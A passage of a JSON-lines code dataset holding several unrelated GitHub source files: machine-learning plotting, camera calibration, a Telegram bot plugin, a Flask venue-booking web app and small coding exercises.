np.random.randn(200, 2)\r\nyXor = np.logical_xor(xXor[:, 0] > 0, xXor[:, 1] > 0)\r\nyXor = np.where(yXor, 1, -1)\r\nplt.scatter(xXor[yXor == 1, 0], xXor[yXor == 1, 1], c='b', marker='x', label='1')\r\nplt.scatter(xXor[yXor == -1, 0], xXor[yXor == -1, 1], c='r', marker='s', label='-1')\r\nplt.xlim([-3, 3])\r\nplt.ylim([-3, 3])\r\nplt.legend(loc='best')\r\nplt.show()\r\n\r\n\r\ndef plotDecisionRegions(x, y, classifier, test_idx=None, resolution=0.02):\r\n markers = ('s', 'x', 'o', '^', 'v')\r\n colors = ('red', 'blue', 'lightgreen', 'gray', 'cyan')\r\n cmap = ListedColormap(colors[:len(np.unique(y))])\r\n\r\n x1Min, x1Max = x[:, 0].min() - 1, x[:, 0].max() + 1\r\n x2Min, x2Max = x[:, 1].min() - 1, x[:, 1].max() + 1\r\n xx1, xx2 = np.meshgrid(np.arange(x1Min, x1Max, resolution), np.arange(x2Min, x2Max, resolution))\r\n z = classifier.predict(np.array([xx1.ravel(), xx2.ravel()]).T)\r\n z = z.reshape(xx1.shape)\r\n plt.contourf(xx1, xx2, z, alpha=0.3, cmap=cmap)\r\n plt.xlim(xx1.min(), xx1.max())\r\n plt.ylim(xx2.min(), xx2.max())\r\n\r\n for idx, c1 in enumerate(np.unique(y)):\r\n plt.scatter(x=x[y == c1, 0], y=x[y == c1, 1], alpha=0.8, c=colors[idx], marker=markers[idx], label=c1,\r\n edgecolor='black')\r\n if test_idx:\r\n xTest, yTest = x[test_idx, :], y[test_idx]\r\n plt.scatter(xTest[:, 0],\r\n xTest[:, 1],\r\n c=\"black\",\r\n edgecolor='black',\r\n alpha=1.0,\r\n linewidth=1,\r\n marker='o',\r\n s=100,\r\n label='Zestaw testowy')\r\n\r\n\r\nsvm = SVC(kernel='rbf', random_state=1, gamma=0.10, C=10.0)\r\nsvm.fit(xXor, yXor)\r\nplotDecisionRegions(xXor, yXor, classifier=svm)\r\nplt.legend(loc='upper left')\r\nplt.show()\r\n","repo_name":"expresoviter/KPI_Study","sub_path":"Semester_4/Applied tasks of Machine Learning/Lab3/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"15450153011","text":"#!/usr/bin/env python\n# coding: utf-8\n#import sys\n#sys.path.append(\"../\")\n\nimport flexiblecc as fcc\nimport glob\nimport numpy as np\nimport cv2\nimport matplotlib.pyplot as plt\nfrom tqdm import tqdm\nimport flexiblecc.Parametric as parcc\nimport os\nimport uuid\nimport json\nimport shutil\nfrom flexiblecc.CentralModel import BundleAdjustment\n\nfolder_out = \"TestRes\"\nrun_name = str(uuid.uuid4())\nfolder_out = os.path.join(folder_out, run_name)\nos.makedirs(folder_out, exist_ok=True)\n\nimport sys\n#sys.stdout = open(os.path.join(folder_out, \"console.txt\"), 'w')\n\ndatasetpath = \"../CalImgs/ChArUco - Sorted/Samsung Galaxy S10 Plus/WideAngle/Fold_1/*.jpg\"\n\nparas = {\n \"cm_stepsize\": 252,\n \"cm_order\": 2,\n \"ls_ftol\": 1e-8,\n \"ls_gtol\": 1e-8,\n \"datasetpath\":datasetpath,\n}\n\nprint(\"paras:\", paras)\n\nwith open(os.path.join(folder_out, \"para.json\"), \"w\", encoding='utf-8') as f:\n json.dump(paras, f, ensure_ascii=False, indent=4)\n\nshutil.copy2(os.path.realpath(__file__), os.path.join(folder_out, \"run_script.txt\"))\n\nimage_files = glob.glob(paras[\"datasetpath\"])\n\ncolor_images = [cv2.imread(f) for f in tqdm(image_files)]\ngayscale_images = [cv2.cvtColor(c_img, cv2.COLOR_BGR2GRAY) for c_img in tqdm(color_images)]\n\nimage_shape = color_images[0].shape[:2]\n\nsquaresX = 28 # [#]\nsquaresY = 19 # [#]\nsquareLength = 0.01 # [m]\nmarkerLength = 0.0075 # [m]\ndictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_1000)\n\ncalibrate_retval, cameraMatrix, distCoeffs, rvecs, tvecs, stdDeviationsIntrinsics, stdDeviationsExtrinsics, perViewErrors, charucoCorners_all, charucoIds_all, markerCorners_all, armarkerIds_all, obj_points_all, board, not_used = parcc.calibrate_camera_charuco(\n gayscale_images, squaresX, squaresY,\n squareLength, markerLength, dictionary, verbose=1)\n\nplt.figure()\nfcc.Metrics.rtvecs_illustration.draw_rtvecs(rvecs, tvecs, obj_points_all)\nplt.tight_layout()\nplt.savefig(os.path.join(folder_out, \"ParBoards.png\"))\nplt.close()\n\nimg_points_all, diff_all, angels_all, mag_all = fcc.Metrics.voronoi.projectPoints_and_cal_angles_and_mag(\n charucoCorners_all, obj_points_all, rvecs, tvecs, cameraMatrix, distCoeffs)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(img_points_all, angels_all)\nplt.savefig(os.path.join(folder_out, \"Par_Voronoi.png\"))\nplt.close()\n\n\nprint(f\"RMS: {calibrate_retval:0.4f} pixels\")\n\n\n\nba = BundleAdjustment(obj_points_all, rvecs, tvecs, charucoCorners_all, cameraMatrix, distCoeffs, image_shape,\n cm_stepsize=paras[\"cm_stepsize\"], cm_order=paras[\"cm_order\"], ls_ftol=paras[\"ls_ftol\"], ls_gtol=paras[\"ls_gtol\"])\n\ncm, res, rvecs_new, tvecs_new = ba.least_squares(folder_out)\n\nfcc.CentralModel.cm_save(cm, os.path.join(folder_out, \"cm\"))\n\n\nrmsCM, residuals_2D, estimated_points_2D, correct_points_2D = ba.calc_residuals_2D(np.array(res.x), return_points_2D=True, verbose=1)\n\nnp.save(os.path.join(folder_out, \"calc_residuals_2D.npy\"), [rmsCM, residuals_2D, estimated_points_2D, correct_points_2D])\n\nrms_vs = f\"{calibrate_retval:0.5f} VS {rmsCM:0.5f}\"\nwith open(os.path.join(folder_out, rms_vs+\".txt\"), \"w\") as f:\n f.write(rms_vs)\nprint(rms_vs)\n\nimage_points = np.concatenate(correct_points_2D)\nproject_points = np.concatenate(estimated_points_2D)\n\nimp, diff, angels, mag = fcc.Metrics.voronoi.cal_angles_and_mag(image_points, project_points)\n\nplt.figure()\nfcc.Metrics.voronoi.plot_voronoi(imp, angels)\nplt.savefig(os.path.join(folder_out, \"CM_Voronoi.png\"))\nplt.close()\n\n#sys.stdout.close()","repo_name":"SimonLBSoerensen/Flexible-Camera-Calibration","sub_path":"Test/bundleAdjustment.py","file_name":"bundleAdjustment.py","file_ext":"py","file_size_in_byte":3465,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"37"} +{"seq_id":"26532818578","text":"def init_lst():\n return [i for i in range(0, 256)]\n\n\nclass KnotTier:\n def __init__(self):\n self.pos = 0\n self.skip = 0\n\n def tie_a_knot(self, start, length, lst):\n if length < 2:\n return\n end = (start + length - 1) % len(lst)\n lst[start], lst[end] = lst[end], lst[start]\n if length == 2:\n return\n start += 1\n start %= len(lst)\n self.tie_a_knot(start, length - 2, lst)\n\n def tie_knots(self, lst, lengths):\n for length in lengths:\n self.tie_a_knot(self.pos, length, lst)\n self.pos += length + self.skip\n self.pos %= len(lst)\n self.skip += 1\n","repo_name":"howsad/aoc2017","sub_path":"src/day10/day10_commons.py","file_name":"day10_commons.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70278593709","text":"import collections\n\nimport pypath.share.curl as curl\nimport pypath.resources.urls as urls\n\n\ndef pazar_interactions():\n\n PazarInteraction = collections.namedtuple(\n 'PazarInteraction',\n ('tf', 'target', 'pmid'),\n )\n\n url = urls.urls['pazar']['url_rescued']\n c = curl.Curl(url, silent = False)\n data = c.result\n\n return [\n PazarInteraction(*map(x.split('\\t').__getitem__, (1, 4, 10)))\n for x in ''.join(data.values()).split('\\n')\n if len(x) > 0\n ]\n","repo_name":"saezlab/pypath","sub_path":"pypath/inputs/pazar.py","file_name":"pazar.py","file_ext":"py","file_size_in_byte":502,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"11087435685","text":"from telegram import Chat, Update, User\nfrom telegram.error import NetworkError, Forbidden\nfrom telegram.ext import CallbackContext, ChatMemberHandler\n\nfrom core.config import JoinGroups, config\nfrom core.plugin import Plugin, handler\nfrom core.services.cookies import CookiesService\nfrom core.services.players import PlayersService\nfrom core.services.users.services import UserAdminService\nfrom utils.chatmember import extract_status_change\nfrom utils.log import logger\n\n\nclass ChatMember(Plugin):\n def __init__(\n self,\n user_admin_service: UserAdminService = None,\n players_service: PlayersService = None,\n cookies_service: CookiesService = None,\n ):\n self.cookies_service = cookies_service\n self.players_service = players_service\n self.user_admin_service = user_admin_service\n\n @handler.chat_member(chat_member_types=ChatMemberHandler.MY_CHAT_MEMBER, block=False)\n async def track_chats(self, update: Update, context: CallbackContext) -> None:\n result = extract_status_change(update.my_chat_member)\n if result is None:\n return\n was_member, is_member = result\n user = update.effective_user\n chat = update.effective_chat\n if chat.type == Chat.PRIVATE:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 启用了机器人\", user.full_name, user.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 屏蔽了机器人\", user.full_name, user.id)\n elif chat.type in [Chat.GROUP, Chat.SUPERGROUP]:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入群 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n await self.greet(user, chat, context)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 群移除Bot\", user.full_name, user.id, chat.title, chat.id)\n else:\n if not was_member and is_member:\n logger.info(\"用户 %s[%s] 邀请BOT进入频道 %s[%s]\", user.full_name, user.id, chat.title, chat.id)\n elif was_member and not is_member:\n logger.info(\"用户 %s[%s] 从 %s[%s] 频道移除Bot\", user.full_name, user.id, chat.title, chat.id)\n\n async def greet(self, user: User, chat: Chat, context: CallbackContext) -> None:\n quit_status = True\n if config.join_groups == JoinGroups.NO_ALLOW:\n try:\n if await self.user_admin_service.is_admin(user.id):\n quit_status = False\n else:\n logger.warning(\"不是管理员邀请!退出群聊\")\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_AUTH_USER:\n try:\n if await self.cookies_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_USER:\n try:\n if await self.players_service.get(user.id) is not None:\n quit_status = False\n except Exception as exc: # pylint: disable=W0703\n logger.error(\"获取信息出现错误\", exc_info=exc)\n elif config.join_groups == JoinGroups.ALLOW_ALL:\n quit_status = False\n else:\n quit_status = True\n if quit_status:\n try:\n await context.bot.send_message(chat.id, \"派蒙不想进去!不是旅行者的邀请!\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n await context.bot.leave_chat(chat.id)\n else:\n try:\n await context.bot.send_message(chat.id, \"感谢邀请小派蒙到本群!请使用 /help 查看咱已经学会的功能。\")\n except Forbidden as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except NetworkError as exc:\n logger.info(\"发送消息失败 %s\", exc.message)\n except Exception as exc:\n logger.info(\"发送消息失败\", exc_info=exc)\n","repo_name":"PaiGramTeam/PaiGram","sub_path":"plugins/system/chat_member.py","file_name":"chat_member.py","file_ext":"py","file_size_in_byte":4609,"program_lang":"python","lang":"en","doc_type":"code","stars":75,"dataset":"github-code","pt":"37"} +{"seq_id":"20336008079","text":"from typing import Optional, Any\n\nfrom objectmodel.base import ObjectModelABC, FieldABC\n\n\n__all__ = [\n 'FieldValidationError',\n 'FieldValueRequiredError',\n 'DuplicateFieldDefinitionError'\n]\n\n\nclass FieldValidationError(AttributeError):\n \"\"\" Field validation error \"\"\"\n\n def __init__(self, instance: Optional[ObjectModelABC], field: FieldABC, value: Any, message: str):\n super().__init__(f'Invalid value {value} for field {field!r} of {instance!r}: {message}')\n\n\nclass FieldValueRequiredError(AttributeError):\n \"\"\" Field is required but not set \"\"\"\n\n def __init__(self, instance: ObjectModelABC, field: FieldABC):\n super().__init__(f'Field {field!r} of {instance!r} is not set')\n\n\nclass DuplicateFieldDefinitionError(AttributeError):\n \"\"\" A field with this name is already present in model \"\"\"\n def __init__(self, field_name: str, class_name: str):\n super().__init__(f'Duplicate field definition found during {class_name} initialization, '\n f'field: {field_name}')\n","repo_name":"bshishov/objectmodel","sub_path":"src/objectmodel/errors.py","file_name":"errors.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74523841066","text":"#----------------------------------------------------------------------------#\n# Imports\n#----------------------------------------------------------------------------#\nimport sys\nimport json\nimport dateutil.parser\nimport babel\nfrom flask import Flask, render_template, request, Response, flash, redirect, url_for, abort\nfrom flask_migrate import Migrate\nfrom flask_moment import Moment\nfrom flask_sqlalchemy import SQLAlchemy\nimport logging\nfrom logging import Formatter, FileHandler\nfrom flask_wtf import Form\nfrom forms import *\n\n#----------------------------------------------------------------------------#\n# App Config.\n#----------------------------------------------------------------------------#\n\napp = Flask(__name__)\nmoment = Moment(app)\napp.config.from_object('config')\ndb = SQLAlchemy(app)\n\n#Instantiate a Migrate object\nmigrate = Migrate(app, db)\n\n#----------------------------------------------------------------------------#\n# Models.\n#----------------------------------------------------------------------------#\nfrom models import *\n\n\n#----------------------------------------------------------------------------#\n# Filters.\n#----------------------------------------------------------------------------#\n\ndef format_datetime(value, format='medium'):\n date = dateutil.parser.parse(value)\n if format == 'full':\n format=\"EEEE MMMM, d, y 'at' h:mma\"\n elif format == 'medium':\n format=\"EE MM, dd, y h:mma\"\n return babel.dates.format_datetime(date, format)\n\napp.jinja_env.filters['datetime'] = format_datetime\n\n#----------------------------------------------------------------------------#\n# Controllers.\n#----------------------------------------------------------------------------#\n\n@app.route('/')\ndef index():\n return render_template('pages/home.html')\n\n\n# Venues\n# ----------------------------------------------------------------\n\n@app.route('/venues')\ndef venues():\n # write a query that selects all venue\n all_venues = (\n Venue.query.with_entities(Venue.city, Venue.state)\n .group_by(Venue.city, Venue.state)\n .all()\n )\n\n data = []\n # display all venues by city/state and name only. Call 'area' per venues. -html -Done\n for area in all_venues:\n venues_in_city = (\n Venue.query.filter(Venue.city == area[0])\n .filter(Venue.state == area[1])\n .all()\n )\n data.append({\"city\": area.city, \"state\": area.state, \"venues\": venues_in_city})\n\n # removed dummy code for neatness\n\n return render_template('pages/venues.html', areas=data);\n\n# Search Venue\n# ----------------------------------------------------------------\n@app.route('/venues/search', methods=['POST'])\ndef search_venues():\n\n #write a search query using ilike() operator - Thank you Miguel Grinberg!\n search_term = request.form.get('search_term', '')\n venues = db.session.query(Venue).filter(Venue.name.ilike('%' + search_term + '%')).all()\n data = []\n\n #loop over venues and display. Similar to show_venue\n for venue in venues:\n num_upcoming_shows = 0\n shows = db.session.query(Show).filter(Show.venue_id == venue.id)\n for show in shows:\n if (show.start_time > datetime.now()):\n num_upcoming_shows += 1;\n\n data.append({\n \"id\": venue.id,\n \"name\": venue.name,\n \"num_upcoming_shows\": num_upcoming_shows\n })\n #use len() to count\n response={\n \"count\": len(venues),\n \"data\": data\n }\n return render_template('pages/search_venues.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/venues/')\ndef show_venue(venue_id):\n\n #write a query that pulls all venue information by ID\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n list_shows = db.session.query(Show).filter(Show.venue_id == venue_id)\n past_shows = []\n upcoming_shows = []\n\n # will need to do an artist query \n for show in list_shows:\n artist = db.session.query(Artist.name, Artist.image_link).filter(Artist.id == show.artist_id).one()\n\n show_add = {\n \"artist_id\": show.artist_id,\n \"artist_name\": artist.name,\n \"artist_image_link\": artist.image_link,\n \"start_time\": show.start_time.strftime('%m/%d/%Y')\n }\n\n if (show.start_time < datetime.now()):\n #print(past_shows, file=sys.stderr)\n past_shows.append(show_add)\n else:\n print(show_add, file=sys.stderr)\n upcoming_shows.append(show_add)\n\n data = {\n \"id\": venue.id,\n \"name\": venue.name,\n \"genres\": venue.genres,\n \"city\": venue.city,\n \"state\": venue.state,\n \"phone\": venue.phone,\n \"website\": venue.website,\n \"facebook_link\": venue.facebook_link,\n \"seeking_talent\": venue.seeking_talent,\n \"seeking_description\": venue.seeking_description,\n \"image_link\": venue.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n\n\n return render_template('pages/show_venue.html', venue=data)\n\n# Create Venue\n# ----------------------------------------------------------------\n\n@app.route('/venues/create', methods=['GET'])\ndef create_venue_form():\n form = VenueForm()\n return render_template('forms/new_venue.html', form=form)\n\n@app.route('/venues/create', methods=['POST'])\ndef create_venue_submission():\n\n response = {}\n error = False\n try:\n name = request.form.get(\"name\")\n city = request.form.get(\"city\")\n state = request.form.get(\"state\")\n address = request.form.get(\"address\")\n phone = request.form.get(\"phone\")\n image_link = request.form['image_link']\n website = request.form.get(\"website\")\n facebook_link = request.form.get(\"facebook_link\")\n genres = request.form.getlist(\"genres\")\n # Created an if statement to accept True/False (wasn't working otherwise) Validated this through Knowledge as well.\n\n seeking_talent = True if 'seeking_talent' in request.form else False \n seeking_description = request.form['seeking_description']\n venue = Venue(\n name=name,\n city=city,\n state=state,\n address=address,\n phone=phone,\n image_link=image_link,\n website=website,\n genres=genres,\n facebook_link=facebook_link,\n seeking_talent=seeking_talent,\n seeking_description=seeking_description\n )\n response[\"name\"] = venue.name\n db.session.add(venue)\n db.session.commit()\n except:\n\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n\n db.session.close()\n if error == False:\n\n # on successful db insert, flash success\n flash('Venue ' + request.form['name'] + ' was successfully listed!')\n else:\n\n flash(\"An error occurred. Venue \" + request.form[\"name\"] + \" could not be listed.\")\n print(sys.exc_info())\n return render_template('pages/home.html')\n\n\n# Update Venue\n# ----------------------------------------------------------------\n@app.route('/venues//edit', methods=['GET'])\ndef edit_venue(venue_id):\n\n form = VenueForm()\n # query database and filter by ID\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n \n # populate the form with Data from DB\n form.name.data = venue.name\n form.city.data = venue.city\n form.state.data = venue.state\n form.address.data = venue.address\n form.phone.data = venue.phone\n form.genres.data = venue.genres\n form.image_link.data = venue.image_link\n form.facebook_link.data = venue.facebook_link\n form.website.data = venue.website\n form.seeking_talent.data = venue.seeking_talent\n form.seeking_description.data = venue.seeking_description\n\n return render_template('forms/edit_venue.html', form=form, venue=venue)\n\n@app.route('/venues//edit', methods=['POST'])\ndef edit_venue_submission(venue_id):\n form = VenueForm(request.form)\n venue = db.session.query(Venue).filter(Venue.id == venue_id).one()\n\n error = False\n\n # Get updated data from form\n name = request.form['name']\n city = request.form['city']\n state = request.form['state']\n address = request.form['address']\n phone = request.form['phone']\n genres = request.form.getlist('genres')\n image_link = request.form['image_link']\n facebook_link = request.form['facebook_link']\n website = request.form['website']\n seeking_talent = True if 'seeking_talent' in request.form else False\n seeking_description = request.form['seeking_description']\n\n try:\n # get venue by ID\n venue = Venue.query.get(venue_id)\n\n # store updated data in variables\n venue.name = name\n venue.city = city\n venue.state = state\n venue.address = address\n venue.phone = phone\n venue.genres = genres\n venue.image_link = image_link\n venue.facebook_link = facebook_link\n venue.website = website\n venue.seeking_talent = seeking_talent\n venue.seeking_description = seeking_description\n\n # commit changes to the DB\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n # Show banner\n if error:\n flash('An error occurred. Venue '+ name + ' could not be updated.','danger'\n )\n else:\n flash('Venue '+ name + ' was successfully updated!', 'success'\n )\n return redirect(url_for('show_venue', venue_id=venue_id))\n\n\n# Delete Venue\n# ----------------------------------------------------------------\n@app.route('/venues/', methods=['DELETE'])\ndef delete_venue(venue_id):\n error = False\n try:\n # To delete a venue, select venue by ID and db.session.delete\n venue = Venue.query.filter(Venue.id == venue_id).first()\n name = venue.name\n\n db.session.delete(venue)\n db.session.commit()\n\n except:\n\n db.session.rollback()\n flash('An error occurred. Venue ' + name + ' wasn\\'t deleted.')\n finally:\n\n db.session.close()\n if error:\n flash('There was an error')\n else:\n # flash if successful\n flash('Venue was successfully deleted.'\n )\n\n # return success\n return render_template('pages/home.html')\n\n\n\n# Artists\n# ----------------------------------------------------------------\n@app.route('/artists')\ndef artists():\n\n # write a query to get all artists - done\n data = db.session.query(Artist).all()\n\n return render_template('pages/artists.html', artists=data)\n\n@app.route('/artists/search', methods=['POST'])\ndef search_artists():\n\n #same as venue query\n search_term = request.form.get('search_term', '')\n artists = db.session.query(Artist).filter(Artist.name.ilike('%' + search_term + '%')).all()\n data = []\n\n for artist in artists:\n num_upcoming_shows = 0\n shows = db.session.query(Show).filter(Show.artist_id == artist.id)\n for show in shows:\n if(show.start_time > datetime.now()):\n num_upcoming_shows += 1;\n data.append({\n \"id\": artist.id,\n \"name\": artist.name,\n \"num_upcoming_shows\": num_upcoming_shows\n })\n response={\n \"count\": len(artists),\n \"data\": data\n }\n return render_template('pages/search_artists.html', results=response, search_term=request.form.get('search_term', ''))\n\n@app.route('/artists/')\ndef show_artist(artist_id):\n\n # Create an artist page: 1)query all data from Artist by unique id\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n list_shows = db.session.query(Show).filter(Show.artist_id == artist_id)\n past_shows = []\n upcoming_shows = []\n\n for show in list_shows:\n venue = db.session.query(Venue.name, Venue.image_link).filter(Venue.id == show.venue_id).one()\n\n show_add = {\n \"venue_id\": show.venue_id,\n \"venue_name\": venue.name,\n \"venue_image_link\": venue.image_link,\n \"start_time\": show.start_time.strftime('%m/%d/%Y')\n }\n\n if (show.start_time < datetime.now()):\n #print(past_shows, file=sys.stderr)\n past_shows.append(show_add)\n else:\n print(show_add, file=sys.stderr)\n upcoming_shows.append(show_add)\n\n data = {\n \"id\": artist.id,\n \"name\": artist.name,\n \"genres\": artist.genres,\n \"city\": artist.city,\n \"state\": artist.state,\n \"phone\": artist.phone,\n \"website\": artist.website,\n \"facebook_link\": artist.facebook_link,\n \"seeking_venue\": artist.seeking_venue,\n \"seeking_description\": artist.seeking_description,\n \"image_link\": artist.image_link,\n \"past_shows\": past_shows,\n \"upcoming_shows\": upcoming_shows,\n \"past_shows_count\": len(past_shows),\n \"upcoming_shows_count\": len(upcoming_shows),\n }\n\n return render_template('pages/show_artist.html', artist=data)\n\n\n# Update\n# ----------------------------------------------------------------\n@app.route('/artists//edit', methods=['GET'])\ndef edit_artist(artist_id):\n \n form = ArtistForm()\n # query database and filter by ID\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n \n # populate the form with Data from DB\n form.name.data = artist.name\n form.city.data = artist.city\n form.state.data = artist.state\n form.phone.data = artist.phone\n form.genres.data = artist.genres\n form.image_link.data = artist.image_link\n form.facebook_link.data = artist.facebook_link\n form.website.data = artist.website\n form.seeking_venue.data = artist.seeking_venue\n form.seeking_description.data = artist.seeking_description\n\n return render_template('forms/edit_artist.html', form=form, artist=artist)\n\n@app.route('/artists//edit', methods=['POST'])\ndef edit_artist_submission(artist_id):\n\n form = ArtistForm(request.form)\n artist = db.session.query(Artist).filter(Artist.id == artist_id).one()\n\n error = False\n\n # Get updated data from form\n name = request.form['name']\n city = request.form['city']\n state = request.form['state']\n phone = request.form['phone']\n genres = request.form.getlist('genres')\n image_link = request.form['image_link']\n facebook_link = request.form['facebook_link']\n website = request.form['website']\n seeking_venue = True if 'seeking_venue' in request.form else False\n seeking_description = request.form['seeking_description']\n\n try:\n # get artist by ID\n artist = Artist.query.get(artist_id)\n\n # store updated data in variables\n artist.name = name\n artist.city = city\n artist.state = state\n artist.phone = phone\n artist.genres = genres\n artist.image_link = image_link\n artist.facebook_link = facebook_link\n artist.website = website\n artist.seeking_venue = seeking_venue\n artist.seeking_description = seeking_description\n\n # commit changes to the DB\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n\n # Show banner\n if error:\n flash('An error occurred. Artist '+ name + ' could not be updated.','danger'\n )\n else:\n flash('Artist '+ name + ' was successfully updated!', 'success'\n )\n\n return redirect(url_for('show_artist', artist_id=artist_id))\n\n\n# Create Artist\n# ----------------------------------------------------------------\n@app.route('/artists/create', methods=['GET'])\ndef create_artist_form():\n form = ArtistForm()\n return render_template('forms/new_artist.html', form=form)\n\n@app.route('/artists/create', methods=['POST'])\ndef create_artist_submission():\n # called upon submitting the new artist listing form\n response = {}\n error = False\n try:\n name = request.form.get(\"name\")\n city = request.form.get(\"city\")\n state = request.form.get(\"state\")\n phone = request.form.get(\"phone\")\n image_link = request.form.get('image_link')\n website = request.form.get('website')\n facebook_link = request.form.get(\"facebook_link\")\n genres = request.form.getlist(\"genres\")\n # Created an if statement to accept True/False (wasn't working otherwise)\n seeking_venue = True if 'seeking_venue' in request.form else False \n seeking_description = request.form['seeking_description']\n artist = Artist(\n name=name,\n city=city,\n state=state,\n phone=phone,\n image_link=image_link,\n genres=genres,\n website=website,\n facebook_link=facebook_link,\n seeking_venue=seeking_venue,\n seeking_description=seeking_description\n )\n response[\"name\"] = artist.name\n db.session.add(artist)\n db.session.commit()\n except:\n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally:\n db.session.close()\n if error == False:\n # on successful db insert, flash success\n flash('Artist ' + request.form['name'] + ' was successfully listed!')\n else:\n flash(\"An error occurred. Artist \" + request.form[\"name\"] + \" could not be listed.\")\n print(sys.exc_info())\n\n return render_template('pages/home.html')\n\n\n# Shows\n# ----------------------------------------------------------------\n@app.route('/shows')\ndef shows():\n # displays list of shows at /shows - done\n #Query shows database and do a join with Venue and Artist\n \n get_shows = db.session.query(Show).join(Venue).join(Artist).all()\n data = []\n # probably use a for loop to display all information from shows.html.\n for show in get_shows:\n data.append({\n \"venue_id\": show.venue_id,\n \"venue_name\": show.venue.name,\n \"artist_id\": show.artist_id,\n \"artist_name\": show.artist.name, \n \"artist_image_link\": show.artist.image_link,\n \"start_time\": show.start_time.strftime('%Y-%m-%d %H:%M:%S')\n })\n return render_template('pages/shows.html', shows=data)\n\n@app.route('/shows/create')\ndef create_shows():\n # renders form. do not touch.\n form = ShowForm()\n return render_template('forms/new_show.html', form=form)\n\n@app.route('/shows/create', methods=['POST'])\ndef create_show_submission():\n # called to create new shows in the db, upon submitting new show listing form\n error = False\n try: \n artist_id = request.form['artist_id']\n venue_id = request.form['venue_id']\n start_time = request.form['start_time']\n\n print(request.form)\n\n show = Show(artist_id=artist_id, venue_id=venue_id, start_time=start_time)\n db.session.add(show)\n db.session.commit()\n except: \n error = True\n db.session.rollback()\n print(sys.exc_info())\n finally: \n db.session.close()\n if error: \n flash('An error occurred. Show could not be listed.')\n if not error: \n flash('Show was successfully listed')\n return render_template('pages/home.html')\n\n@app.errorhandler(404)\ndef not_found_error(error):\n return render_template('errors/404.html'), 404\n\n@app.errorhandler(500)\ndef server_error(error):\n return render_template('errors/500.html'), 500\n\n\nif not app.debug:\n file_handler = FileHandler('error.log')\n file_handler.setFormatter(\n Formatter('%(asctime)s %(levelname)s: %(message)s [in %(pathname)s:%(lineno)d]')\n )\n app.logger.setLevel(logging.INFO)\n file_handler.setLevel(logging.INFO)\n app.logger.addHandler(file_handler)\n app.logger.info('errors')\n\n#----------------------------------------------------------------------------#\n# Launch.\n#----------------------------------------------------------------------------#\n\n# Default port:\nif __name__ == '__main__':\n app.run()\n\n# Or specify port manually:\n'''\nif __name__ == '__main__':\n port = int(os.environ.get('PORT', 5000))\n app.run(host='0.0.0.0', port=port)\n'''\n","repo_name":"tonyrizzotto/fyyurproject","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":20532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36465121805","text":"#\n# * Core 99, Are Isomorphic\n# * Medium\n\n# * Two two-dimensional arrays are isomorphic if they have the same number of \n# * rows and each pair of respective rows contains the same number of elements.\n\n# Given two two-dimensional arrays, check if they are isomorphic.\n\n# Example\n\n# For\n\n# array1 = [[1, 1, 1],\n# [0, 0]]\n\n# and\n\n# array2 = [[2, 1, 1],\n# [2, 1]]\n\n# the output should be\n# areIsomorphic(array1, array2) = true;\n\n# For\n\n# array1 = [[2],\n# []]\n\n# and\n\n# array2 = [[2]]\n\n# the output should be\n# areIsomorphic(array1, array2) = false.\n\n# Input/Output\n\n# [execution time limit] 4 seconds (py3)\n\n# [input] array.array.integer array1\n\n# Guaranteed constraints:\n# 1 ≤ array1.length ≤ 5,\n# 0 ≤ array1[i].length ≤ 5,\n# 0 ≤ array1[i][j] ≤ 50.\n\n# [input] array.array.integer array2\n\n# Guaranteed constraints:\n# 1 ≤ array2.length ≤ 5,\n# 0 ≤ array2[i].length ≤ 5,\n# 0 ≤ array2[i][j] ≤ 50.\n\n# [output] boolean\n\n#%%\n\n# * Solution 1\ndef areIsomorphic(array1:list, array2:list)-> bool:\n n1 = len(array1)\n n2 = len(array2)\n if n1 != n2:\n return False\n for i in range(n1):\n if len(array1[i]) != len(array2[i]):\n return False\n\n return True\n\n\n# * Solution 2\ndef areIsomorphic2(array1:list, array2:list)-> bool:\n return (len(array1) == len(array2)) and all([len(array1[i]) == len(array2[i]) for i in range(len(array1))])\n\n\n# * 